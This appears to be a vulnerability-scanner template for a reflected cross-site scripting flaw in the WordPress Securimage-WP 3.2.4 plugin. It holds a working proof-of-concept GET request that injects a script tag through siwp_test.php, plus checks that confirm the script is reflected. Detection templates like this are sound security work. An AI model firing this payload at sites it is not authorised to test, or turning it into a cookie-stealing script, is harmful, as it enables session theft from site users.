product: WordPress
vName: WordPress Securimage-WP 3.2.4 - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress Securimage-WP 3.2.4 plugin contains a cross-site scripting vulnerability via siwp_test.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/38510
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
    verify:
      logic: and
      check:
        - body:
            value:
              - <script>alert(1)</script>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
